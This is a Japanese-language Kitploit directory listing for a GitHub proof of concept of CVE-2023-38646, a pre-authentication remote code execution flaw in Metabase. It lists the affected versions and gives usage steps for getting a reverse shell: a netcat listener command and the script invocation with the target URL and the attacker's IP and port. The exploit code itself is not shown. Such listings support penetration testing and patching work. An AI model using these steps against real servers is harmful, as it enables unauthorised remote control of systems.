Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/mrunalkaran/cve-2023-38646
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubmrunalkaran/cve-2023-38646

CVE-2023-38646

Metabase 事前認証 RCE PoC

リポジトリを見る
2年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Metabase 事前認証RCE POC - CVE-2023-38646

Metabase オープンソース 0.46.6.1 より前、および Metabase Enterprise 1.46.6.1 より前のバージョンでは、攻撃者がサーバー上で任意のコマンドを実行できます。このスクリプトは、攻撃者のマシン上でリバースシェルを取得するために直接作成しました。

使用方法

このスクリプトには、ターゲット URL、攻撃者の IP、ポートが必要です。このエクスプロイトでは、スクリプトが /api/session/properties から取得を試みるため、セットアップトークンを指定する必要はありません。

攻撃者のマシンで netcat リスナーを起動してください。次のコマンドを使用します: nc -nlvp {Port}

POC スクリプトを実行するには、以下のオプションを指定します:

  • -u - ターゲット URL (Metabase)
  • -ip - 攻撃者の IP
  • -p - ポート番号
root@kitploit:~
python3 CVE-2023-38646.py -u <target-url> -ip <IP> -p <PORT>

POC

参考文献

  • https://github.com/m3m0o/metabase-pre-auth-rce-poc/
  • https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
ツールをダウンロード